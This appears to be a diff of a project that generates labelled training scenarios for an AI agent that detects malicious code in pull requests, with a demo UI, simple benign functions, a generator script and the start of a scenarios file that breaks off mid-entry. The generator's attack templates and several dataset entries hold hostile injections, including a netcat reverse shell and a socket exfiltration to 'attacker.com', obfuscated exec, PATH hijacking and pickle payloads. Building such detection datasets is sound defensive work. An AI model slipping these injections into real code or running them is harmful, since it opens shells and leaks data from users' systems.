+ if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
110
+ scenario = {
111
+ "id": "custom",
112
+ "label": "unknown",
113
+ "type": "custom",
114
+ "code_snippet": code_input,
115
+ "patch": None
116
+ }
117
+
118
+ with st.spinner("Agent computing actions in OpenEnv..."):
119
+ obs, _ = env.reset(options={"scenario": scenario})
120
+
121
+ # Dummy policy for UI demonstration since we don't load the real adapter here yet
122
+ time.sleep(1)
123
+ risk = obs["risk_score"][0]
124
+ action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE
125
+
126
+ # If merely analyzed, let's step once more to see what we do
127
+ if action == env.ACTION_ANALYZE:
128
+ obs, reward, done, _, info = env.step(action)
129
+ action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW
130
+
131
+ obs, reward, done, _, info = env.step(action)
132
+
133
+ st.subheader("Agent Report")
134
+
135
+ c1, c2, c3 = st.columns(3)
136
+ c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
137
+ action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
138
+ c2.metric("Agent Action Taken", action_names[action])
139
+ c3.metric("Reward Received", f"{reward:+.2f}")
140
+
141
+ # Display tabs for detailed results
142
+ tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])
143
+
144
+ with tab1:
145
+ if action == env.ACTION_BLOCK_PR:
146
+ st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
147
+ elif action == env.ACTION_SUBMIT_PATCH:
148
+ st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
149
+ st.json(info)
150
+ else:
151
+ st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)
152
+
153
+ with tab2:
154
+ st.markdown("**(Telemetry simulates background execution for static code)**")
155
+ if "telemetry" in info:
156
+ st.json(info["telemetry"])
157
+ else:
158
+ st.info("No sandbox execution triggered for this path.")
159
+
160
+ with tab3:
161
+ if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
162
+ st.code(scenario["patch"], language='python')
163
+ if info.get("validation_success"):
164
+ st.success("Patch passed 3-stage validation pipeline!")
165
+ else:
166
+ st.info("No patch generated.")
167
+
168
+ if __name__ == "__main__":
169
+ main()
sentinel_synth/data/__init__.py ADDED
File without changes
sentinel_synth/data/benign/ds_binarysearch.py ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ def binary_search(arr, target):
2
+ """Perform binary search."""
3
+ low = 0
4
+ high = len(arr) - 1
5
+ while low <= high:
6
+ mid = (low + high) // 2
7
+ if arr[mid] == target:
8
+ return mid
9
+ elif arr[mid] < target:
10
+ low = mid + 1
11
+ else:
12
+ high = mid - 1
13
+ return -1
sentinel_synth/data/benign/ds_linkedlist.py ADDED
@@ -0,0 +1,19 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ class Node:
2
+ def __init__(self, data):
3
+ self.data = data
4
+ self.next = None
5
+
6
+ class LinkedList:
7
+ """A simple linked list."""
8
+ def __init__(self):
9
+ self.head = None
10
+
11
+ def append(self, data):
12
+ new_node = Node(data)
13
+ if not self.head:
14
+ self.head = new_node
15
+ return
16
+ last = self.head
17
+ while last.next:
18
+ last = last.next
19
+ last.next = new_node
sentinel_synth/data/benign/ds_queue.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ class Queue:
2
+ """A simple queue implementation."""
3
+ def __init__(self):
4
+ self.items = []
5
+
6
+ def enqueue(self, item):
7
+ self.items.insert(0, item)
8
+
9
+ def dequeue(self):
10
+ if not self.is_empty():
11
+ return self.items.pop()
12
+ return None
13
+
14
+ def is_empty(self):
15
+ return len(self.items) == 0
sentinel_synth/data/benign/ds_sorting.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ def bubble_sort(arr):
2
+ """Sort an array using bubble sort."""
3
+ n = len(arr)
4
+ for i in range(n):
5
+ for j in range(0, n-i-1):
6
+ if arr[j] > arr[j+1]:
7
+ arr[j], arr[j+1] = arr[j+1], arr[j]
8
+ return arr
sentinel_synth/data/benign/ds_stack.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ class Stack:
2
+ """A simple stack implementation."""
3
+ def __init__(self):
4
+ self.items = []
5
+
6
+ def push(self, item):
7
+ self.items.append(item)
8
+
9
+ def pop(self):
10
+ if not self.is_empty():
11
+ return self.items.pop()
12
+ return None
13
+
14
+ def is_empty(self):
15
+ return len(self.items) == 0
sentinel_synth/data/benign/io_config.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ def read_ini_config(content):
2
+ """Read a simple INI configuration."""
3
+ config = {}
4
+ current_section = None
5
+ for line in content.split('\n'):
6
+ line = line.strip()
7
+ if not line or line.startswith('#'):
8
+ continue
9
+ if line.startswith('[') and line.endswith(']'):
10
+ current_section = line[1:-1]
11
+ config[current_section] = {}
12
+ elif '=' in line and current_section:
13
+ key, val = line.split('=', 1)
14
+ config[current_section][key.strip()] = val.strip()
15
+ return config
sentinel_synth/data/benign/io_csv.py ADDED
@@ -0,0 +1,11 @@
 
 
 
 
 
 
 
 
 
 
 
 
1
+ def parse_csv(csv_content):
2
+ """Parse simple CSV content."""
3
+ lines = csv_content.strip().split('\n')
4
+ if not lines:
5
+ return []
6
+ headers = lines[0].split(',')
7
+ result = []
8
+ for line in lines[1:]:
9
+ values = line.split(',')
10
+ result.append(dict(zip(headers, values)))
11
+ return result
sentinel_synth/data/benign/io_json.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ import json
2
+
3
+ def format_json(obj):
4
+ """Format dictionary as readable JSON string."""
5
+ return json.dumps(obj, indent=4, sort_keys=True)
sentinel_synth/data/benign/io_log.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ def parse_logs(log_lines):
2
+ """Parse simple log lines into level and message."""
3
+ parsed = []
4
+ for line in log_lines:
5
+ parts = line.split(' - ', 1)
6
+ if len(parts) == 2:
7
+ parsed.append({"level": parts[0].strip('[]'), "message": parts[1]})
8
+ return parsed
sentinel_synth/data/benign/io_template.py ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
+ def render_template(template, context):
2
+ """Simple template rendering replacing {{key}}."""
3
+ result = template
4
+ for key, value in context.items():
5
+ result = result.replace(f"{{{{{key}}}}}", str(value))
6
+ return result
sentinel_synth/data/benign/math_factorial.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ def factorial(n):
2
+ """Calculate the factorial of a number."""
3
+ if n == 0:
4
+ return 1
5
+ return n * factorial(n - 1)
sentinel_synth/data/benign/math_fibonacci.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ def fibonacci(n):
2
+ """Return the nth Fibonacci number."""
3
+ if n <= 0:
4
+ return 0
5
+ elif n == 1:
6
+ return 1
7
+ return fibonacci(n - 1) + fibonacci(n - 2)
sentinel_synth/data/benign/math_gcd.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ def gcd(a, b):
2
+ """Calculate the Greatest Common Divisor."""
3
+ while b:
4
+ a, b = b, a % b
5
+ return a
sentinel_synth/data/benign/math_matrix.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ def matrix_addition(mat1, mat2):
2
+ """Add two matrices."""
3
+ return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]
sentinel_synth/data/benign/math_prime.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ def is_prime(n):
2
+ """Check if a number is prime."""
3
+ if n <= 1:
4
+ return False
5
+ for i in range(2, int(n ** 0.5) + 1):
6
+ if n % i == 0:
7
+ return False
8
+ return True
sentinel_synth/data/benign/misc_calc.py ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ def basic_calculator(a, b, op):
2
+ """Perform a basic math operation."""
3
+ if op == '+':
4
+ return a + b
5
+ elif op == '-':
6
+ return a - b
7
+ elif op == '*':
8
+ return a * b
9
+ elif op == '/':
10
+ if b == 0:
11
+ raise ValueError("Division by zero")
12
+ return a / b
13
+ return None
sentinel_synth/data/benign/misc_date.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ def format_iso_date(year, month, day):
2
+ """Format date components into an ISO 8601 string."""
3
+ return f"{year:04d}-{month:02d}-{day:02d}"
sentinel_synth/data/benign/misc_password.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ def is_strong_password(pwd):
2
+ """Check if password meets basic strength criteria."""
3
+ if len(pwd) < 8:
4
+ return False
5
+ has_upper = any(c.isupper() for c in pwd)
6
+ has_lower = any(c.islower() for c in pwd)
7
+ has_digit = any(c.isdigit() for c in pwd)
8
+ return has_upper and has_lower and has_digit
sentinel_synth/data/benign/misc_temp.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ def celsius_to_fahrenheit(c):
2
+ """Convert Celsius to Fahrenheit."""
3
+ return (c * 9/5) + 32
4
+
5
+ def fahrenheit_to_celsius(f):
6
+ """Convert Fahrenheit to Celsius."""
7
+ return (f - 32) * 5/9
sentinel_synth/data/benign/misc_url.py ADDED
@@ -0,0 +1,11 @@
 
 
 
 
 
 
 
 
 
 
 
 
1
+ def parse_url_params(url):
2
+ """Parse query parameters from a URL."""
3
+ if '?' not in url:
4
+ return {}
5
+ query = url.split('?', 1)[1]
6
+ params = {}
7
+ for pair in query.split('&'):
8
+ if '=' in pair:
9
+ k, v = pair.split('=', 1)
10
+ params[k] = v
11
+ return params
sentinel_synth/data/benign/str_anagram.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ def is_anagram(s1, s2):
2
+ """Check if two strings are anagrams."""
3
+ return sorted(s1.replace(" ", "").lower()) == sorted(s2.replace(" ", "").lower())
sentinel_synth/data/benign/str_caesar.py ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ def caesar_cipher(text, shift):
2
+ """Apply Caesar cipher to text."""
3
+ result = ""
4
+ for char in text:
5
+ if char.isalpha():
6
+ start = ord('a') if char.islower() else ord('A')
7
+ result += chr((ord(char) - start + shift) % 26 + start)
8
+ else:
9
+ result += char
10
+ return result
sentinel_synth/data/benign/str_palindrome.py ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ def is_palindrome(s):
2
+ """Check if a string is a palindrome."""
3
+ cleaned = ''.join(c.lower() for c in s if c.isalnum())
4
+ return cleaned == cleaned[::-1]
sentinel_synth/data/benign/str_slug.py ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
+ def generate_slug(title):
2
+ """Generate a URL-friendly slug."""
3
+ import re
4
+ title = title.lower()
5
+ title = re.sub(r'[^a-z0-9\s-]', '', title)
6
+ return re.sub(r'[\s-]+', '-', title).strip('-')
sentinel_synth/data/benign/str_wordcount.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ def word_count(text):
2
+ """Count occurrences of words in text."""
3
+ words = text.split()
4
+ counts = {}
5
+ for word in words:
6
+ counts[word] = counts.get(word, 0) + 1
7
+ return counts
sentinel_synth/data/generate_scenarios.py ADDED
@@ -0,0 +1,253 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import json
3
+ import random
4
+ import subprocess
5
+ import tempfile
6
+ import uuid
7
+ from pathlib import Path
8
+
9
+ # ============================================================
10
+ # Attack Templates for Mutation Engine (Track B)
11
+ # ============================================================
12
+ ATTACK_TEMPLATES = {
13
+ "typosquatting": {
14
+ "inject": "import pythonn\n\n",
15
+ "patch": "",
16
+ },
17
+ "obfuscated_exec": {
18
+ "inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
19
+ "patch": "",
20
+ },
21
+ "env_hijack": {
22
+ "inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
23
+ "patch": "",
24
+ },
25
+ "subprocess_backdoor": {
26
+ "inject": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\n",
27
+ "patch": "",
28
+ },
29
+ "eval_hidden": {
30
+ "inject": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
31
+ "patch": "",
32
+ },
33
+ "pickle_deserialization": {
34
+ "inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
35
+ "patch": "",
36
+ },
37
+ "socket_exfil": {
38
+ "inject": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\n",
39
+ "patch": "",
40
+ },
41
+ "malicious_import": {
42
+ "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
43
+ "patch": ""
44
+ }
45
+ }
46
+
47
+ def load_benign_files(benign_dir):
48
+ files_data = []
49
+ if not os.path.exists(benign_dir):
50
+ return files_data
51
+ for filename in os.listdir(benign_dir):
52
+ if filename.endswith(".py"):
53
+ with open(os.path.join(benign_dir, filename), "r") as f:
54
+ content = f.read()
55
+ files_data.append({"filename": filename, "code": content})
56
+ return files_data
57
+
58
+ def auto_generate_unit_test(filename, code):
59
+ """Generates a simple unit test that passes when run against the patched code."""
60
+ test_code = "import code\n"
61
+ if "fibonacci" in code:
62
+ test_code += "assert code.fibonacci(5) == 5\n"
63
+ elif "factorial" in code:
64
+ test_code += "assert code.factorial(5) == 120\n"
65
+ elif "is_prime" in code:
66
+ test_code += "assert code.is_prime(7) == True\n"
67
+ elif "gcd" in code:
68
+ test_code += "assert code.gcd(48, 18) == 6\n"
69
+ elif "is_palindrome" in code:
70
+ test_code += "assert code.is_palindrome('racecar') == True\n"
71
+ elif "celsius_to_fahrenheit" in code:
72
+ test_code += "assert code.celsius_to_fahrenheit(0) == 32\n"
73
+ else:
74
+ # Minimal test: just ensure the module loads without error
75
+ test_code += "assert True # module loaded successfully\n"
76
+ return test_code
77
+
78
+ def generate_track_b_scenarios(benign_files, num_examples=40):
79
+ """Track B: Custom mutation engine (always used)."""
80
+ scenarios = []
81
+ # True Positives (20)
82
+ for i in range(20):
83
+ bf = random.choice(benign_files)
84
+ attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
85
+ malicious_code = attack_data["inject"] + bf["code"]
86
+ test_code = auto_generate_unit_test(bf["filename"], bf["code"])
87
+ scenarios.append({
88
+ "id": f"tp_{uuid.uuid4().hex[:8]}",
89
+ "type": "true_positive",
90
+ "code_snippet": malicious_code,
91
+ "patch": bf["code"],
92
+ "unit_test_code": test_code,
93
+ "label": "malicious",
94
+ "source": "mutation_engine",
95
+ "attack_type": attack_name
96
+ })
97
+ # False Positives (10)
98
+ fp_templates = [
99
+ ("fp_eval", "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\n"),
100
+ ("fp_requests", "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\n"),
101
+ ("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
102
+ ("fp_base64", "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\n")
103
+ ]
104
+ for i in range(10):
105
+ bf = random.choice(benign_files)
106
+ fp_name, fp_code = random.choice(fp_templates)
107
+ suspicious_code = fp_code + bf["code"]
108
+ test_code = auto_generate_unit_test(bf["filename"], bf["code"])
109
+ scenarios.append({
110
+ "id": f"fp_{uuid.uuid4().hex[:8]}",
111
+ "type": "false_positive",
112
+ "code_snippet": suspicious_code,
113
+ "patch": None,
114
+ "unit_test_code": test_code,
115
+ "label": "benign",
116
+ "source": "mutation_engine",
117
+ "attack_type": None
118
+ })
119
+ # Functional (10)
120
+ for i in range(10):
121
+ bf = random.choice(benign_files)
122
+ test_code = auto_generate_unit_test(bf["filename"], bf["code"])
123
+ scenarios.append({
124
+ "id": f"fn_{uuid.uuid4().hex[:8]}",
125
+ "type": "functional",
126
+ "code_snippet": bf["code"],
127
+ "patch": None,
128
+ "unit_test_code": test_code,
129
+ "label": "benign",
130
+ "source": "mutation_engine",
131
+ "attack_type": None
132
+ })
133
+ return scenarios
134
+
135
+ def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
136
+ """
137
+ Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
138
+ Follows the 4-stage pipeline: ingest -> create -> curate -> save-as
139
+ """
140
+ sdk_scenarios = []
141
+
142
+ # Check if synthetic-data-kit CLI is available
143
+ try:
144
+ subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
145
+ except (subprocess.SubprocessError, FileNotFoundError):
146
+ print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
147
+ return sdk_scenarios
148
+
149
+ # Path to our SDK config
150
+ config_path = Path(__file__).parent / "sdk_config.yaml"
151
+ if not config_path.exists():
152
+ print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
153
+ return sdk_scenarios
154
+
155
+ # Create a temporary directory for the SDK workspace
156
+ with tempfile.TemporaryDirectory() as tmpdir:
157
+ tmp_path = Path(tmpdir)
158
+ workspace_dir = tmp_path / "sdk_workspace"
159
+ workspace_dir.mkdir()
160
+
161
+ # 1. Ingest (We'll ingest the benign files as seeds)
162
+ try:
163
+ benign_dir = Path(__file__).parent / "benign"
164
+ if benign_dir.exists():
165
+ subprocess.run(
166
+ ["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(workspace_dir / "ingested")],
167
+ check=True, capture_output=True
168
+ )
169
+
170
+ # 2. Create (Generate synthetic examples)
171
+ subprocess.run(
172
+ ["synthetic-data-kit", "create", str(workspace_dir / "ingested"),
173
+ "--type", "qa", "-c", str(config_path), "--output", str(workspace_dir / "created")],
174
+ check=True, capture_output=True, timeout=600
175
+ )
176
+
177
+ # 3. Curate (Filter low-quality examples)
178
+ subprocess.run(
179
+ ["synthetic-data-kit", "curate", str(workspace_dir / "created"),
180
+ "--output", str(workspace_dir / "curated")],
181
+ check=True, capture_output=True
182
+ )
183
+
184
+ # 4. Save-As (Export to JSON)
185
+ output_json = workspace_dir / "final_sdk.json"
186
+ subprocess.run(
187
+ ["synthetic-data-kit", "save-as", str(workspace_dir / "curated"),
188
+ "--format", "json", "--output", str(output_json)],
189
+ check=True, capture_output=True
190
+ )
191
+
192
+ # Load generated data and convert to our format
193
+ if output_json.exists():
194
+ with open(output_json, "r") as f:
195
+ data = json.load(f)
196
+ for item in data:
197
+ # Expecting keys based on sdk_config.yaml prompts
198
+ sdk_scenarios.append({
199
+ "id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
200
+ "type": "true_positive" if item.get("patch") else "functional",
201
+ "code_snippet": item.get("code_snippet") or item.get("code"),
202
+ "patch": item.get("patch"),
203
+ "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
204
+ "label": "malicious" if item.get("patch") else "benign",
205
+ "source": "synthetic_data_kit",
206
+ "attack_type": item.get("attack_type", "llm_generated")
207
+ })
208
+ except subprocess.TimeoutExpired:
209
+ print("⚠️ SDK generation timed out.")
210
+ except subprocess.CalledProcessError as e:
211
+ print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
212
+
213
+ return sdk_scenarios
214
+
215
+ def main():
216
+ import argparse
217
+ parser = argparse.ArgumentParser()
218
+ parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
219
+ parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
220
+ parser.add_argument("--use-sdk", action="store_true", help="Use Meta synthetic-data-kit (requires `synth` CLI)")
221
+ parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
222
+ args = parser.parse_args()
223
+
224
+ benign_files = load_benign_files(args.benign_dir)
225
+ if not benign_files:
226
+ print(f"No benign files found in {args.benign_dir}. Create some first.")
227
+ return
228
+
229
+ # Start with Track B scenarios (mutation engine)
230
+ scenarios = generate_track_b_scenarios(benign_files, 40)
231
+
232
+ # Add Track A (Meta SDK) if requested
233
+ if args.use_sdk:
234
+ # Note: output_dir is passed implicitly via creating a temp dir inside the fxn now
235
+ # the argument `args.output` is where final aggregated data is saved
236
+ sdk_scenarios = generate_track_a_scenarios_with_sdk(os.path.dirname(args.output), args.sdk_samples)
237
+ scenarios.extend(sdk_scenarios)
238
+ if sdk_scenarios:
239
+ print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")
240
+
241
+ # Shuffle and save
242
+ random.shuffle(scenarios)
243
+ os.makedirs(os.path.dirname(args.output), exist_ok=True)
244
+ with open(args.output, "w") as f:
245
+ json.dump(scenarios, f, indent=4)
246
+
247
+ print(f"Total scenarios: {len(scenarios)}")
248
+ print(f" Malicious: {len([s for s in scenarios if s['label'] == 'malicious'])}")
249
+ print(f" Benign: {len([s for s in scenarios if s['label'] == 'benign'])}")
250
+ print(f"Saved to {args.output}")
251
+
252
+ if __name__ == "__main__":
253
+ main()
sentinel_synth/data/scenarios.json ADDED
@@ -0,0 +1,402 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "id": "fp_4cc36ade",
4
+ "type": "false_positive",
5
+ "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
6
+ "patch": null,
7
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
8
+ "label": "benign",
9
+ "source": "mutation_engine",
10
+ "attack_type": null
11
+ },
12
+ {
13
+ "id": "fp_dd7e5a4d",
14
+ "type": "false_positive",
15
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
16
+ "patch": null,
17
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
18
+ "label": "benign",
19
+ "source": "mutation_engine",
20
+ "attack_type": null
21
+ },
22
+ {
23
+ "id": "tp_7ffae123",
24
+ "type": "true_positive",
25
+ "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
26
+ "patch": "def bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
27
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
28
+ "label": "malicious",
29
+ "source": "mutation_engine",
30
+ "attack_type": "obfuscated_exec"
31
+ },
32
+ {
33
+ "id": "fp_6ab25c4e",
34
+ "type": "false_positive",
35
+ "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n \"\"\"Calculate the factorial of a number.\"\"\"\n if n == 0:\n return 1\n return n * factorial(n - 1)",
36
+ "patch": null,
37
+ "unit_test_code": "import code\nassert code.factorial(5) == 120\n",
38
+ "label": "benign",
39
+ "source": "mutation_engine",
40
+ "attack_type": null
41
+ },
42
+ {
43
+ "id": "tp_c9e41cb4",
44
+ "type": "true_positive",
45
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
46
+ "patch": "def matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
47
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
48
+ "label": "malicious",
49
+ "source": "mutation_engine",
50
+ "attack_type": "env_hijack"
51
+ },
52
+ {
53
+ "id": "tp_5593ef6c",
54
+ "type": "true_positive",
55
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
56
+ "patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
57
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
58
+ "label": "malicious",
59
+ "source": "mutation_engine",
60
+ "attack_type": "malicious_import"
61
+ },
62
+ {
63
+ "id": "fn_69406790",
64
+ "type": "functional",
65
+ "code_snippet": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
66
+ "patch": null,
67
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
68
+ "label": "benign",
69
+ "source": "mutation_engine",
70
+ "attack_type": null
71
+ },
72
+ {
73
+ "id": "tp_76aa219b",
74
+ "type": "true_positive",
75
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
76
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
77
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
78
+ "label": "malicious",
79
+ "source": "mutation_engine",
80
+ "attack_type": "socket_exfil"
81
+ },
82
+ {
83
+ "id": "fp_661ae03e",
84
+ "type": "false_positive",
85
